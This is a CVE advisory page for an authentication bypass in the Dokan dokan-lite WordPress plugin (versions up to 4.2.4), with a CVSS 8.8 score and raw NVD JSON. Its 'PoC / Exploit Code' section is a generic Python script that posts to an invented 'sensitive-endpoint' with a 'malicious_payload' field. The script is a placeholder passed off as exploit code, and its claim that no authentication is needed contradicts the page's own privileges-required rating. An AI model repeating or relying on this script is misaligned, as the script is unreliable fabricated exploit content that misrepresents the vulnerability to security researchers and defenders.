Security Vulnerability Report
中文
CVE-2026-24359 CVSS 8.8 HIGH

CVE-2026-24359

Published: 2026-03-25 17:16:37
Last Modified: 2026-04-24 16:32:54

Description

Authentication Bypass Using an Alternate Path or Channel vulnerability in Dokan, Inc. Dokan dokan-lite allows Authentication Abuse.This issue affects Dokan: from n/a through <= 4.2.4.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Dokan dokan-lite <= 4.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (replace with actual target) target_url = "http://example.com/wp-json/dokan/v1/sensitive-endpoint" # Attacker attempts to access a restricted endpoint without authentication # The vulnerability allows bypassing the usual auth check via an alternate path try: response = requests.post( target_url, data={ "action": "update_settings", "malicious_payload": "exploit_data" } ) if response.status_code == 200: print("[+] Authentication bypass successful! Response:") print(response.text) else: print("[-] Failed to exploit. Status code:", response.status_code) except Exception as e: print("[!] Error:", str(e))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24359", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:36.840", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Dokan, Inc. Dokan dokan-lite allows Authentication Abuse.This issue affects Dokan: from n/a through <= 4.2.4."}, {"lang": "es", "value": "Vulnerabilidad de omisión de autenticación usando una ruta o canal alternativo en Dokan, Inc. Dokan dokan-lite permite el abuso de autenticación. Este problema afecta a Dokan: desde n/a hasta &lt;= 4.2.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/dokan-lite/vulnerability/wordpress-dokan-plugin-4-2-4-broken-authentication-vulnerability?_s_id=cve", "source": "[email protected]"}]}}